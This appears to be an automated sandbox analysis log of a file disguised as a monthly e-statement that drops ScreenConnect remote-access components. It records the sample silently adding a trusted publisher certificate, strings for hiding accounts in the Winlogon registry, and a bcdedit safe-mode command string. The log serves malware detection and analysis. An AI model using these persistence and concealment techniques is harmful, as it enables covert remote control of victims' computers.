                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1563335386.0000000000C4D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4242000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4383000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4242000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4383000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B424A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EBB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569312203.0000000002F12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EAB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.1568117293.0000000005462000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.Client.dll.1.drStatic PE information: 0xB8CD3C5A [Sat Mar 31 22:21:14 2068 UTC]
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: real checksum: 0x1bda6 should be: 0x1d486
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21BC0 push ecx; ret 0_2_00F21BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC35D2A5 pushad ; iretd 1_2_00007FFAAC35D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC47A798 push ebp; retn 5F4Ah1_2_00007FFAAC4A7A28
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4951F8 pushfd ; retf 1_2_00007FFAAC495991
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC477D00 push eax; retf 1_2_00007FFAAC477D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC494C6D push edx; retn 000Eh1_2_00007FFAAC494C6E
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC47842E pushad ; ret 1_2_00007FFAAC47845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC47845E push eax; ret 1_2_00007FFAAC47846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC452D68 push eax; ret 7_2_00007FFAAC452E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC453F3A pushad ; retf 7_2_00007FFAAC453F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC45401A push eax; iretd 7_2_00007FFAAC45401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC452FDA pushad ; retf 7_2_00007FFAAC452FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC4530BA push eax; iretd 7_2_00007FFAAC4530BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC454162 push eax; ret 7_2_00007FFAAC454163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeCode function: 8_2_010A1247 push esp; retf 8_2_010A1251
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeCode function: 8_2_010A18B1 push 54053933h; retf 8_2_010A18BD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC777B30 push ss; iretd 10_2_00007FFAAC777B31
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dll
                  Source: ScreenConnect.ClientService.dll.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Windows\System32\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.1567594933.0000000002CD2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.3155817267.00000000029B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.3156144988.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 1E8B2260000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 1E8CBC80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Memory allocated: 14D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Memory allocated: 1B150000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 10A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 2E40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 2BE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 14E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 1610000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 3610000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 2860000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 1AA40000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3039Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 5603Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
